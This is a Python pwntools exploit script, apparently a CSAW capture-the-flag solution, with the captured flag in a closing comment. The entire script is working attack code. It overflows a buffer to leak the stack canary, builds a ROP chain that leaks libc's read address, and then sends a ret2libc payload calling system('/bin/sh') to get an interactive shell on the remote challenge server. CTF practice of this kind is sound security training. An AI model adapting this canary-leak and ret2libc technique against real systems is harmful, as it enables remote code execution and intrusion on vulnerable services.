#usr/bin/python

#Faid Mohammed Amine 
#Fb : piratuer

from pwn import *


libc = ELF("libc-2.23.so")
r = remote("pwn.chal.csaw.io", 3764)

def send_f():
	r.recvuntil(">>")
	r.sendline("1")
	r.recvuntil(">>")
	r.send("A"*168+"\x01")
	r.recvuntil(">>")
	r.sendline("2")
	r.recvuntil("A"*168)
	address = u64(r.recvline()[0:8])-1

	return address


canary = send_f()
log.info("Canary:"+hex(canary))
r.recvuntil(">>")
r.sendline("1")
r.recvuntil(">>")

def payload_I():
	payload = "A"*168
	payload += p64(canary)
	payload += "B"*4
	payload += "B"*4
	payload += p64(0x00400ea3) 
	payload += p64(0x0000000000602030)
	payload += p64(0x4008d0)
	payload += p64(0x0000000000400a96)
	return str(payload)


r.send(payload_I())

r.recvuntil(">>")
r.sendline("3")
r.recvline()

libc.address = int("0x"+hex(u64("\x00"+r.recvline()[0:8]))[3:15],16)-libc.symbols['read']
system = libc.symbols['system']
bin_sh = libc.address+0x18cd17

def payload_II():
	payload = "A"*168
	payload += p64(canary)
	payload += "B"*8
	payload += p64(0x00400ea3) 
	payload += p64(bin_sh)
	payload += p64(system)
	return str(payload)


r.recvuntil(">>")
r.sendline("1")
r.recvuntil(">>")
r.sendline(payload_II())

r.recvuntil(">>")
r.sendline("3")

r.interactive()

#flag{sCv_0n1y_C0st_50_M!n3ra1_tr3at_h!m_we11}